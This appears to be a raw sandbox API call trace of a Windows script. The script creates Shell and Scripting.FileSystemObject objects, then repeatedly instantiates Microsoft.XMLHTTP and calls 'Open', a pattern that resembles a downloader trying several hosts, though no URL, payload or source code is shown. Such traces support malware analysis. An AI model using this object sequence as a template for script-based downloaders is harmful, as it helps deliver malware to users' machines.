	[0235.357] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0235.357] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0235.357] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0235.357] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0235.357] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0235.357] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0235.358] SysStringLen (param_1=0x0) returned 0x0
	[0235.358] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0235.360] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0235.360] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0235.360] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0235.360] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0235.360] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0235.360] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0235.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0235.421] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0235.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0235.422] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.422] SysStringLen (param_1=0x0) returned 0x0
	[0235.422] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.422] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0235.422] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0235.422] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.422] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0235.422] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.422] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0235.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0235.423] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0235.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.423] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.425] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.425] SysStringLen (param_1=0x0) returned 0x0
	[0235.425] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.425] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0235.425] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0235.425] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.425] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0235.425] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.425] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0235.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0235.425] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0235.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.425] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.425] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.425] SysStringLen (param_1=0x0) returned 0x0
	[0235.425] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.426] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0235.426] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.426] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.426] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.426] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.426] SysStringLen (param_1=0x0) returned 0x0
	[0235.426] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.426] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0235.426] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.426] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.426] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0235.426] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.427] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.427] longjmp () 
	[0235.427] longjmp () 
	[0235.427] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.427] SysStringLen (param_1=0x0) returned 0x0
	[0235.427] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.427] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0235.427] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0235.427] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.427] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.427] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0235.427] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.427] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.427] longjmp () 
	[0235.428] longjmp () 
	[0235.428] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.428] SysStringLen (param_1=0x0) returned 0x0
	[0235.428] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
